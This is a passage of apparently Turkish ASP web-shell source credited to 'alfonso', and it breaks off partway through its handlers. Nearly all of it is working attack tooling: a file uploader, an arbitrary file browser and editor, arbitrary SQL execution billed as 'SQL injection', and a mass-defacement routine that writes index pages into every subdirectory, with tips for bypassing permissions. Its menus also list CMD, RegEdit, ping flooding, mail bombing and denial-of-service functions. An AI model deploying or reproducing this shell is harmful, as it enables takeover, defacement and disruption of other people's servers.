Dim lbinBuffer
llngLength = LenB(pbinBinaryData)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
Call lobjRs.Update()
lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
Call lobjRs.Close()
Set lobjRs = Nothing
ASCII2Bytes = lbinBuffer
End Function
Private Function Bytes2Unicode(ByRef pbinBytes)
Dim lobjRs
Dim llngLength
Dim lstrBuffer
llngLength = LenB(pbinBytes)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
Call lobjRs.Update()
lstrBuffer = lobjRs.Fields("BinaryData").Value
Call lobjRs.Close()
Set lobjRs = Nothing
Bytes2Unicode = lstrBuffer
End Function
End Class
function addslash(path)
if right(path,1)="\" then addslash=path else addslash=path & "\"
end function
sub Upload()
dim objUpload,f,max,i,name,path,size,success
set objUpload=New clsUpload
targetPath=objUpload.Fields("folder").Value
max=objUpload.Fields("max").Value
for i=1 to max
name=objUpload.Fields("file" & i).FileName
size=objUpload.Fields("file" & i).Length
if (name<>"") and (size>0) then
gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
path=addslash(targetPath) & name
objUpload.Fields("file" & i).SaveAs path
if FSO.FileExists(path) then
on error resume next
set f=objFSO.GetFile(path)
if IsObject(f) then
if f.Size=size then success=true else success=false
end if
set f=nothing
end if
if success then gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
end if
next
response.Write gMsg
set objUpload=nothing
end sub
' MD5 kodlama baþladýý..
Private Const BITS_TO_A_BYTE = 8
Private Const BYTES_TO_A_WORD = 4
Private Const BITS_TO_A_WORD = 32
Private m_lOnBits(30)
Private m_l2Power(30)
m_lOnBits(0) = CLng(1)
m_lOnBits(1) = CLng(3)
m_lOnBits(2) = CLng(7)
m_lOnBits(3) = CLng(15)
m_lOnBits(4) = CLng(31)
m_lOnBits(5) = CLng(63)
m_lOnBits(6) = CLng(127)
m_lOnBits(7) = CLng(255)
m_lOnBits(8) = CLng(511)
m_lOnBits(9) = CLng(1023)
m_lOnBits(10) = CLng(2047)
m_lOnBits(11) = CLng(4095)
m_lOnBits(12) = CLng(8191)
m_lOnBits(13) = CLng(16383)
m_lOnBits(14) = CLng(32767)
m_lOnBits(15) = CLng(65535)
m_lOnBits(16) = CLng(131071)
m_lOnBits(17) = CLng(262143)
m_lOnBits(18) = CLng(524287)
m_lOnBits(19) = CLng(1048575)
m_lOnBits(20) = CLng(2097151)
m_lOnBits(21) = CLng(4194303)
m_lOnBits(22) = CLng(8388607)
m_lOnBits(23) = CLng(16777215)
m_lOnBits(24) = CLng(33554431)
m_lOnBits(25) = CLng(67108863)
m_lOnBits(26) = CLng(134217727)
m_lOnBits(27) = CLng(268435455)
m_lOnBits(28) = CLng(536870911)
m_lOnBits(29) = CLng(1073741823)
m_lOnBits(30) = CLng(2147483647)
m_l2Power(0) = CLng(1)
m_l2Power(1) = CLng(2)
m_l2Power(2) = CLng(4)
m_l2Power(3) = CLng(8)
m_l2Power(4) = CLng(16)
m_l2Power(5) = CLng(32)
m_l2Power(6) = CLng(64)
m_l2Power(7) = CLng(128)
m_l2Power(8) = CLng(256)
m_l2Power(9) = CLng(512)
m_l2Power(10) = CLng(1024)
m_l2Power(11) = CLng(2048)
m_l2Power(12) = CLng(4096)
m_l2Power(13) = CLng(8192)
m_l2Power(14) = CLng(16384)
m_l2Power(15) = CLng(32768)
m_l2Power(16) = CLng(65536)
m_l2Power(17) = CLng(131072)
m_l2Power(18) = CLng(262144)
m_l2Power(19) = CLng(524288)
m_l2Power(20) = CLng(1048576)
m_l2Power(21) = CLng(2097152)
m_l2Power(22) = CLng(4194304)
m_l2Power(23) = CLng(8388608)
m_l2Power(24) = CLng(16777216)
m_l2Power(25) = CLng(33554432)
m_l2Power(26) = CLng(67108864)
m_l2Power(27) = CLng(134217728)
m_l2Power(28) = CLng(268435456)
m_l2Power(29) = CLng(536870912)
m_l2Power(30) = CLng(1073741824)
Private Function LShift(lValue, iShiftBits)
If iShiftBits = 0 Then
LShift = lValue
Exit Function
ElseIf iShiftBits = 31 Then
If lValue And 1 Then
LShift = &H80000000
Else
LShift = 0
End If
Exit Function
ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
Err.Raise 6
End If
If (lValue And m_l2Power(31 - iShiftBits)) Then
LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000
Else
LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))
End If
End Function
Private Function RShift(lValue, iShiftBits)
If iShiftBits = 0 Then
RShift = lValue
Exit Function
ElseIf iShiftBits = 31 Then
If lValue And &H80000000 Then
RShift = 1
Else
RShift = 0
End If
Exit Function
ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
Err.Raise 6
End If
RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)
If (lValue And &H80000000) Then
RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))
End If
End Function
Private Function RotateLeft(lValue, iShiftBits)
RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))
End Function
Private Function AddUnsigned(lX, lY)
Dim lX4
Dim lY4
Dim lX8
Dim lY8
Dim lResult
lX8 = lX And &H80000000
lY8 = lY And &H80000000
lX4 = lX And &H40000000
lY4 = lY And &H40000000
lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)
If lX4 And lY4 Then
lResult = lResult Xor &H80000000 Xor lX8 Xor lY8
ElseIf lX4 Or lY4 Then
If lResult And &H40000000 Then
lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8
Else
lResult = lResult Xor &H40000000 Xor lX8 Xor lY8
End If
Else
lResult = lResult Xor lX8 Xor lY8
End If
AddUnsigned = lResult
End Function
Private Function Fq(x, y, z)
Fq = (x And y) Or ((Not x) And z)
End Function
Private Function Gq(x, y, z)
Gq = (x And z) Or (y And (Not z))
End Function
Private Function Hq(x, y, z)
Hq = (x Xor y Xor z)
End Function
Private Function Iq(x, y, z)
Iq = (y Xor (x Or (Not z)))
End Function
Private Sub FF(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(Fq(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub
Private Sub GG(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(Gq(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub
Private Sub HH(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(Hq(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub
Private Sub II(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(Iq(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub
'*********************************************************
'************* COnverted by ALFONSO ;) ****************
'******* The Brute Algortihms Owned to alfonso ;) ******
'*********************************************************
'*********************************************************
Private Function ConvertToWordArray(sMessage)
Dim lMessageLength
Dim lNumberOfWords
Dim lWordArray()
Dim lBytePosition
Dim lByteCount
Dim lWordCount
Const MODULUS_BITS = 512
Const CONGRUENT_BITS = 448
lMessageLength = Len(sMessage)
lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)
ReDim lWordArray(lNumberOfWords - 1)
lBytePosition = 0
lByteCount = 0
Do Until lByteCount >= lMessageLength
lWordCount = lByteCount \ BYTES_TO_A_WORD
lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)
lByteCount = lByteCount + 1
Loop
lWordCount = lByteCount \ BYTES_TO_A_WORD
lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)
lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)
lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)
ConvertToWordArray = lWordArray
End Function
Private Function WordToHex(lValue)
Dim lByte
Dim lCount
For lCount = 0 To 3
lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)
WordToHex = WordToHex & Right("0" & Hex(lByte), 2)
Next
End Function
Public Function MD5(sMessage)
Dim x
Dim k
Dim AA
Dim BB
Dim CC
Dim DD
Dim a
Dim b
Dim c
Dim d
Const S11 = 7
Const S12 = 12
Const S13 = 17
Const S14 = 22
Const S21 = 5
Const S22 = 9
Const S23 = 14
Const S24 = 20
Const S31 = 4
Const S32 = 11
Const S33 = 16
Const S34 = 23
Const S41 = 6
Const S42 = 10
Const S43 = 15
Const S44 = 21
x = ConvertToWordArray(sMessage)
a = &H67452301
b = &HEFCDAB89
c = &H98BADCFE
d = &H10325476
For k = 0 To UBound(x) Step 16
AA = a
BB = b
CC = c
DD = d
FF a, b, c, d, x(k + 0), S11, &HD76AA478
FF d, a, b, c, x(k + 1), S12, &HE8C7B756
FF c, d, a, b, x(k + 2), S13, &H242070DB
FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE
FF a, b, c, d, x(k + 4), S11, &HF57C0FAF
FF d, a, b, c, x(k + 5), S12, &H4787C62A
FF c, d, a, b, x(k + 6), S13, &HA8304613
FF b, c, d, a, x(k + 7), S14, &HFD469501
FF a, b, c, d, x(k + 8), S11, &H698098D8
FF d, a, b, c, x(k + 9), S12, &H8B44F7AF
FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1
FF b, c, d, a, x(k + 11), S14, &H895CD7BE
FF a, b, c, d, x(k + 12), S11, &H6B901122
FF d, a, b, c, x(k + 13), S12, &HFD987193
FF c, d, a, b, x(k + 14), S13, &HA679438E
FF b, c, d, a, x(k + 15), S14, &H49B40821
GG a, b, c, d, x(k + 1), S21, &HF61E2562
GG d, a, b, c, x(k + 6), S22, &HC040B340
GG c, d, a, b, x(k + 11), S23, &H265E5A51
GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA
GG a, b, c, d, x(k + 5), S21, &HD62F105D
GG d, a, b, c, x(k + 10), S22, &H2441453
GG c, d, a, b, x(k + 15), S23, &HD8A1E681
GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8
GG a, b, c, d, x(k + 9), S21, &H21E1CDE6
GG d, a, b, c, x(k + 14), S22, &HC33707D6
GG c, d, a, b, x(k + 3), S23, &HF4D50D87
GG b, c, d, a, x(k + 8), S24, &H455A14ED
GG a, b, c, d, x(k + 13), S21, &HA9E3E905
GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8
GG c, d, a, b, x(k + 7), S23, &H676F02D9
GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A
HH a, b, c, d, x(k + 5), S31, &HFFFA3942
HH d, a, b, c, x(k + 8), S32, &H8771F681
HH c, d, a, b, x(k + 11), S33, &H6D9D6122
HH b, c, d, a, x(k + 14), S34, &HFDE5380C
HH a, b, c, d, x(k + 1), S31, &HA4BEEA44
HH d, a, b, c, x(k + 4), S32, &H4BDECFA9
HH c, d, a, b, x(k + 7), S33, &HF6BB4B60
HH b, c, d, a, x(k + 10), S34, &HBEBFBC70
HH a, b, c, d, x(k + 13), S31, &H289B7EC6
HH d, a, b, c, x(k + 0), S32, &HEAA127FA
HH c, d, a, b, x(k + 3), S33, &HD4EF3085
HH b, c, d, a, x(k + 6), S34, &H4881D05
HH a, b, c, d, x(k + 9), S31, &HD9D4D039
HH d, a, b, c, x(k + 12), S32, &HE6DB99E5
HH c, d, a, b, x(k + 15), S33, &H1FA27CF8
HH b, c, d, a, x(k + 2), S34, &HC4AC5665
II a, b, c, d, x(k + 0), S41, &HF4292244
II d, a, b, c, x(k + 7), S42, &H432AFF97
II c, d, a, b, x(k + 14), S43, &HAB9423A7
II b, c, d, a, x(k + 5), S44, &HFC93A039
II a, b, c, d, x(k + 12), S41, &H655B59C3
II d, a, b, c, x(k + 3), S42, &H8F0CCC92
II c, d, a, b, x(k + 10), S43, &HFFEFF47D
II b, c, d, a, x(k + 1), S44, &H85845DD1
II a, b, c, d, x(k + 8), S41, &H6FA87E4F
II d, a, b, c, x(k + 15), S42, &HFE2CE6E0
II c, d, a, b, x(k + 6), S43, &HA3014314
II b, c, d, a, x(k + 13), S44, &H4E0811A1
II a, b, c, d, x(k + 4), S41, &HF7537E82
II d, a, b, c, x(k + 11), S42, &HBD3AF235
II c, d, a, b, x(k + 2), S43, &H2AD7D2BB
II b, c, d, a, x(k + 9), S44, &HEB86D391
a = AddUnsigned(a, AA)
b = AddUnsigned(b, BB)
c = AddUnsigned(c, CC)
d = AddUnsigned(d, DD)
Next
MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d))
End Function
'***************************************************************************************************************************
'*************************** MD5 KOdlarý Biter. *************************************************************************
'***************************************************************************************************************************
if popup = False then
'Link ve Konum paneli by alfonso
'Türk Bayraðý Ascii Karakterlerle - Created By ALFONSO
Response.Write "<center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000""> </td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center>"
response.write "<center><table width=""100%"" align=""center"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center""><br>"
response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm""> <a href='"&FilePath&"?mode=37&konum="&konum&"&Time="&time&"'><b>Sistem Analizi*</b></a> | <a href='"&FilePath&"?mode=18&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b>MASS Attack</b></a> | <a href='"&FilePath&"?mode=21&konum="&FolderPath&"&Time="&time&"' onclick=""tester(this.href);return false;""><b> Permision Tester </b></a> | <a href='"&FilePath&"?mode=24&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>Klasör Ýþlemleri</b></a> | <a href='"&FilePath&"?mode=28&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> CMD </b></a> | <a href='"&FilePath&"?mode=34&konum="&konum&"&Time="&time&"' ><b> My-MS_SQL </b></a> | <a href='"&FilePath&"?mode=45&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> RegEdit </b></a> | <a href='"&FilePath&"?mode=99&konum="&konum&"&Time="&time&"' onclick=""biz(this.href);return false;""><b> *Biz Kimiz*! </b></a> </td></tr></table><br>"
response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm""> <a href='"&FilePath&"?mode=30&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> Ping Saldýrýsý </b></a> | <a href='"&FilePath&"?mode=33&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Mail Bombardýmaný </b></a> | <a href='"&FilePath&"?mode=31&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Ram & Cpu Saldýrýsý </b></a> | <a href='"&FilePath&"?mode=32&konum="&konum&"&Time="&time&"' onclick=""somur(this.href);return false;""><b> Denial Attack </b></a> | <a href='"&FilePath&"?mode=39&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b> MD5&Serv-U </b></a> | <a href='"&FilePath&"?mode=42&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> MSWCTools </b></a> | <a href='"&FilePath&"?mode=44&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> XMLHTTP </b></a> </td></tr></table><br>"
response.write "</td></tr><td><tr><form action = "" "&FilePath&"?mode=23&konum="&konum&"&Time="&time&" "" method=""post""><table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm""> <b>Arama: </b></td><td><input name=""hacked"" value=""mdb"" type=""text"" style=""width:200px;""></td><td><input type=""Submit"" value="" Ara » "" style=""width:70; font-weight:bold;""></td></tr></table></td></form></tr><td><tr>"
response.write "<form action = "" "&FilePath&"?mode=1&Time="&time&" "" method=""post"">"
response.write "<table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm""> <b>Konum : </b></td><td><input name=""remote"" value='"&konum&"' type=""text"" style=""width:350px;""></td><td><input type=""Submit"" value=""Git »"" style=""width:50; font-weight:bold;""></td></tr></table>"
response.write ""
response.write "</td></form></tr>"
response.write "</table></center>"
'Yetki paneli Coded by alfonso
response.write "<table width=""100%"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<table cellpadding=""0"" cellspacing=""0"">"
response.write "<tr><td style=""background-color:121212"" class=""kbrtm""> <b>Yetki :</b> </td>"
call yetki
response.write "</tr></table>"
response.write "<br></td></tr></table><br>"
end if
SELECT CASE mode
CASE 2 ' Dizin kopyala TAÞI Coded by alfonso
on error resume next
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>Dizin Kopyala / Taþý Merkezi</b>")
tablo30(" ")
response.write "<input type=""hidden"" value=""3"" name=""mode""><input type=""hidden"" value="&file&" name=""file2""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> "
tablo12("Kop. Yer : <input style='color=#C6FCBE' size=""60"" type=""text"" name=""FolderPath2"" value="&FolderPath&">")
tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala <input type=radio name='islem' value='tasi'>Tasi ")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata
CASE 3 ' dizin kop taþýmam gerçekleþiyor by alfonso
on error resume next
if islem="kopyala" then
FSO.CopyFolder konum,FolderPath2
isl="kopyalandý.."
elseif islem="tasi" then
FSO.MoveFolder konum,FolderPath2
isl="taþýndý.."
end if
response.Write "<br><br><center>Klasor "&isl&" <br>"
response.Write "<br><font color=yellow>Kaynak : </font>"&FolderPath&"<br><font color=yellow>Hedef : </font>"&FolderPath2
response.Write "<br><br>by alfonso</center>"
Call Hata
CASE 4 ' Dizin SÝlmee by alfonso
on error resume next
FSO.DeleteFolder del
if err<>0 then
Call olmadi("Dizin Silenemdi")
else
Call oldu("Dizin Silindi")
end if
CASE 5 ' Dosya silme olayý gerçekliþiypor by alfonso
on error resume next
FSO.DeleteFile del
if err<>0 then
Call olmadi("Dosya Silinemedi")
else
Call oldu("Dosya Silindi")
end if
'CASE 6 ' Dosya Dowlaod etme by alfonso
' Download hatalý olduðu için, ÜSTTE taþýdýmm
CASE 7 ' Dosya Kopayla Taþýma POST kýsmý by alfonso
on error resume next
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
tablo30(" <b>Dosya Kopyala / Taþý Merkezi</b>")
tablo30(" ")
response.write "<input type=""hidden"" value=""8"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""><input type=""hidden"" value="&file&" name=""file""> "
tablo12("Kop. Yer : <input size=""60"" type=""text"" name=""folder"" value="&file&">")
tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala <input type=radio name='islem' value='tasi'>Tasi ")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata
CASE 8 ' Dosya kopyala, taþýmaa olayý by alfonso
on error resume next
if islem="kopyala" then
FSO.CopyFile file,folder&""
isl="kopyalandý.."
elseif islem="tasi" then
FSO.MoveFile file,folder&""
isl="taþýndý.."
end if
if err <> 0 then
response.Write "<br><br><center>Baþarýsýzlýkla sonuçlandý !!! <br>"
else
response.Write "<br><br><center>Klasor "&isl&" <br>"
end if
response.Write "<br><font color=yellow>Kaynak : </font>"&file&"<br><font color=yellow>Hedef : </font>"&folder&"\"
response.Write "<br><br>by alfonso</center>"
Call Hata
CASE 9 ' Dosya Ýçini görüntüle by alfonso
on error resume next
Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
Response.Write "<table class=""kbrtm"" width=100% ><tr><td>"
set f = FSO.OpenTextFile(file,1)
Response.Write "<font size=3><pre>"&Server.HTMLEncode(f.readAll)&"</pre></font>"
Response.Write "</td></tr></table>"
nolist = True
if err<>62 then Hata
if err.number=62 then
Response.Write "<script language=javascript>alert('Bu Dosya Okunamýyor\nSistem dosyasý olabilir')</script>"
nolist = False
end if
CASE 10 ' ASP txt php .. gibi dosyalarý Editlemek için POSt kýsmý by alfonso
on error resume next
set f = FSO.OpenTextFile(file,1)
response.Write "<center><form action='"&FilePath&"?Time="&time&"&konum="&FolderPath&"' method=""post""><table class=""kbrtm""><tr><td align=""center"">"
Response.Write "<input type=hidden name=""mode"" value='11'>"
Response.Write "<input type=hidden name=file value="&file&">"
Response.Write "<br><br><input type=submit value="" .. :: Kaydet :: .. ""><br><br></td></tr><tr><td align=""center"">"
Response.Write "<textarea name=""islem"" style='width:90%;height:350;'>"
Response.Write server.HTMLEncode(f.readAll)
Response.Write "</textarea></td></tr></table></form></center>"
Call Hata
nolist = True
CASE 11 ' Editleme olayýý gerçekleþiyor by alfonso
on error resume next
set saveTextFile = FSO.OpenTextFile(file,2,true,false)
Call Hata
saveTextFile.Write(islem)
saveTextFile.close
if err<>0 then
olmadi("Editlenemedii")
else
oldu("Editlendi")
end if
CASE 12 ' Resim Dosyasýný Görüntülee by alfonso
on error resume next
Response.Write "<br><center><img ALT=""CyberWarrior // ALFONSO"" src='"&file&"'></center><br><br>"
Call Hata
nolist = True
CASE 13 ' SQL için TAblolarý Listeleme by alfonso
Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
Set objConn = Server.CreateObject("ADODB.Connection")
Set objADOX = Server.CreateObject("ADOX.Catalog")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = file
objConn.Open
objADOX.ActiveConnection = objConn
response.write "<table class=""kbrtm"">"
For Each table in objADOX.Tables
If table.Type = "TABLE" Then
Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=14&file="&file&"&table="&table.Name&"&konum="&FolderPath&"&time="&time&"'>"&table.Name&"</a></td></tr>"
End If
Next
response.write "</table>"
response.write "</center>"
Call Hata
nolist = True
CASE 14 ' TAblo içeriði görüntüleme by alfonso
Call SQL_menu_by_alfonso
Call SQL_by_alfonso(file,table)
nolist = True
CASE 15 ' SQL kod yerleþtirme olayý by alfonso
if islem = "select" then inject = inject1
if islem = "delete" then inject = inject2
if islem = "insert" then inject = inject3
if islem = "update" then inject = inject4
if islem = "diger" then inject = inject5
SQL_menu_by_alfonso
response.write "<br><center>Db Yeri : <font color=#C6FCBE>"&file&"</font></center>"
response.write "<br><center>Sql komut : <font color=#C6FCBE>"&inject&"</font></center><br>"
if islem = "select" then
if not alfonsosql = "" then
Call MSSQL_by_alfonso(alfonsosql,inject)
else
Call SQL_by_alfonso(file,inject)
end if
else
on error resume next
if alfonsosql = "" then
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Provider = "Microsoft.Jet.Oledb.4.0"
objConn.ConnectionString = file
objConn.Open
else
Set objConn = Server.CreateObject("ADODB.Connection")
Set objRcs = Server.CreateObject("ADODB.RecordSet")
objConn.Open alfonsosql
end if
if err <> 0 then
response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz SaðlanaMAdýý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
else
on error resume next
objRcs.Open inject,objConn, adOpenKeyset , , adCmdText
if err <> 0 then
Call olmadi("<br>SQL Ýnjection Komutunuzda HATA var. Bilmiyorsan Kullanma<br><br>")
else
Call oldu("<br> SQL Ýnjection Baþarýyla GErçekleþtii.<br><br>")
end if
end if
objRcs.close
objConn.close
end if
nolist = True
CASE 16 ' Dosya ADI deðiþtirme Formu by alfonso
on error resume next
response.write "<table width=""100%"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dosyanameedit"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"" >"
tablo30(" <b>Dosya ADý deðiþtirme MErkezi</b>")
tablo30("Adý : <font color=#C6FCBE>"&islem&"</font> <br> Yeri : <font color=#C6FCBE>"&file&"</font>")
response.write "<input type=""hidden"" value=""17"" name=""mode""><input type=""hidden"" value="&file&" name=""file""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> "
tablo12("<b>Dosyanýn Yeni Adý: </b> <input size=""30"" type=""text"" name=""islem"" value="&islem&">")
tablo12("<br><input value="" Gönder "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
Call Hata
CASE 17 ' Dosya Adý deðiþtirme Olayý gerçekleþiyor by ALFONSO
on error resume next
Set fileObject = fso.GetFile(file)
fileObject.Name = islem
if err <> 0 then
Call olmadi("<br>DOsya Adý deðiþeMEdii<br><br>")
else
Call oldu("<br>Dosya Adý deðiþti<br><br>")
end if
Set fileObject = Nothing
Call Hata
CASE 18 ' MAss Defeced Merkezi by alfonso
on error resume next
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""massattack"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
tablo30(" <b>MASS Defaced Merkezi</b>")
tablo30("...... ::::: Ýndex KOD unu Aþaðýya Yaz / Yapýþtýr ::::: ......")
tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""konum"" value='"&konum&"' type=""text""><br><br>")
response.write "<input type=""hidden"" value=""19"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> "
tablo12O("<textarea style=""width:500px; height:250px"" name=""file""></textarea>")
tablo12O(" <input type=""radio"" value=""brute"" name=""islem"" checked> Brute - <input value=""single"" type=""radio"" name=""islem"" > Single - <input value=""ozel"" type=""radio"" name=""islem"" > Private <input name=""inject1"" value=""z.html"" type=""text"" size=15> <input value=""ok"" type=checkbox name=""hash3"" >Eklenti <input size=15 name=""hash2"" value=""httpdocs\"" type=""text"">")
tablo12O("<input name=""hash9"" value=""copy"" type=radio checked> Kopyalayarak - <input name=""hash9"" value=""yarat"" type=radio> Oluþturarak")
tablo12O("<input value="" Havayaa Uçurr "" type=""Submit"">")
yazsol("<font color=#C6FCBE><b>Brute : </b>Belirtilen Dizinin ALtýndaki; Tüm Dizinlere ve onlarýnda ALt Dizinleri Ýndex BAsar. </font>")
yazsol("<font color=#C6FCBE><b>Single : </b>Belirtilen Dizinin ALtýndaki; Alt Dizinlere Ýndex BAsar. </font>")
yazsol("<font color=#C6FCBE><b>Private : </b>Belirtilen Dizinin ALtýndaki; Alt Dizinlere Ýstediðiniz Ýsimle Ýndex BAsar. </font> ")
yazsol("<font color=#C6FCBE><b>Eklenti : </b>BRUTE & Single ile kullanýlýr. Permsion var ise bunu seçmenize ayarlamanýza gerek yok. Eðer site isimlerini listeleytebiliyor, ve içine girremiyor fakat klasör atlayarak girebiliyorsanýz. o zaman bunu seçin ve bulunan klasörrden sonrakine gidip oraya index leri atar. Mesela ; '..site\alfonso_com', '..\site\haber_com' .. gibi siteelr listeli. bunlarýn içlerine giridðinizde görüntülkeme yetkinzi yok . Ama eðer '..\site\alfonso_com\www\' yapýnca girebiliyorsnaýz. PERMÝSÝON aþma yöntemidir. böylece Eklenti yerine 'www' yazarak ve seçerekden. tüm sitelere o klaösr içine girme yetkisini saðlayýp, index býraktýrýrrýz. </font> ")
yazsol("<font color=#C6FCBE><b>Kopyalayarak : </b>FSO dizinine bir TXT yazar. Sonra onu TÜm klasörlere KOpyalayarak iþlem yapar. Eðer FSO dizininde yazma yok ise, iþlem gerçekleþmez. TÜM MASS lar böyledir. </font> ")
yazsol("<font color=#C6FCBE><b>Yaratarak : </b>Direk index kodunuzu, Klasölerde OLUÞTURARAk MASS yapar. BU alfonso & alfonsoPORTAL.CoM FARký ile. 1-2 defa baþýma geldi=) o yüzden bu özelleiði ekledim.</font> ")
yazsol("<font color=#FE7A84><b>NOT : </b>Brute & Single da 9 çeþit index basar, Private da Ýstdiðiniz Ýsimle 1 tane atar ;) </font>")
response.write "</table></td></form></tr></table><br>"
Call Hata
CASE 19 ' MAss Attack ÝÞleniyor. Eðer Ýndex yok ise, Hata ve FOrm sunuyor, aksi halde MASS yapýyor.
